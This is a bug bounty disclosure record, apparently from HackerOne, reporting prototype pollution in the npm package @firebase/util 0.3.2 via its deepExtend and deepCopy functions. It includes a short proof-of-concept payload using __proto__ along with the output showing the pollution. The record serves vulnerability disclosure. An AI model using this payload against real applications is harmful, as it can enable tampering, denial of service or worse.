{"id": "H1:1001218", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Node.js third-party modules: [@firebase/util] Prototype pollution", "description": "# Module\n\n**module name:** `@firebase/util`\n**version:** `0.3.2`\n**npm page:** `https://www.npmjs.com/package/@firebase/util`\n\n## Module Description\n\nNOTE: This is specifically tailored for Firebase JS SDK usage, if you are not a member of the Firebase team, please avoid using this package\n\nThis is a wrapper of some Webchannel Features for the Firebase JS SDK.\n\n## Module Stats\n\n[1,516,157] weekly downloads\n\n# Vulnerability\n\n## Vulnerability Description\n\nI tested the [`deepCopy`](https://github.com/firebase/firebase-js-sdk/blob/master/packages/util/src/deepCopy.ts) and [`deepExtend`](https://github.com/firebase/firebase-js-sdk/blob/master/packages/util/src/deepCopy.ts) functions.\n\nThe `deepCopy` and `deepExtend` functions can be used to add/modify properties of the Object prototype. These properties will be present on all objects.\n\n## Steps To Reproduce:\n- install `@firebase/util` module:\n - `npm i ``@firebase/util`\n\nRun the following poc:\n```javascript\nconst utils = require('@firebase/util');\n\nconst obj = {};\nconst source = JSON.parse('{\"__proto__\":{\"polluted\":\"yes\"}}');\nconsole.log(\"Before : \" + obj.polluted);\nutils.deepExtend({}, source);\n// utils.deepCopy(source);\nconsole.log(\"After : \" + obj.polluted);\n\n```\nOutput:\n```console\n\nBefore : undefined\nAfter : yes\n```\n{F1024346}\n\n## Supporting Material/References:\n\n- OPERATING SYSTEM VERSION: Ubuntu 18.04.4 LTS\n- NODEJS VERSION: v14.11.0\n- NPM VERSION: 6.14.8\n\n# Wrap up\n\n- I contacted the maintainer to let them know: [N] \n- I opened an issue in the related repository: [N] \n\n\nThank you for your time.\n\nbest regards,\n\nd3lla\n\n## Impact\n\nThe impact depends on the application. In some cases it is possible to achieve Denial of service (DoS), Remote Code Execution, Property Injection.", "published": "2020-10-07T15:00:05", "modified": "2020-11-17T17:42:42", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1001218", "reporter": "d3lla", "references": [], "cvelist": [], "lastseen": "2020-11-17T18:30:53", "viewCount": 6, "enchantments": {"dependencies": {"references": [], "modified": "2020-11-17T18:30:53", "rev": 2}, "score": {"value": 0.1, "vector": "NONE", "modified": "2020-11-17T18:30:53", "rev": 2}, "vulnersScore": 0.1}, "bounty": 0.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/nodejs-ecosystem", "handle": "nodejs-ecosystem", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/023/949/3ea3b2ae039a8f955a4a8fe65d99fe85dc817398_original./3afcb5c896247e7ee8ada31b1c1eb8657e22241f911093acfe4ec7e97a3a959a", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/023/949/3ea3b2ae039a8f955a4a8fe65d99fe85dc817398_original./eb31823a4cc9f6b6bb4db930ffdf512533928a68a4255fb50a83180281a60da5"}}, "h1reporter": {"disabled": false, "username": "d3lla", "url": "/d3lla", "profile_picture_urls": {"small": "/assets/avatars/default-71a302d706457f3d3a31eb30fa3e73e6cf0b1d677b8fa218eaeaffd67ae97918.png"}, "is_me?": false, "cleared": false, "hackerone_triager": false, "hacker_mediation": false}}

{}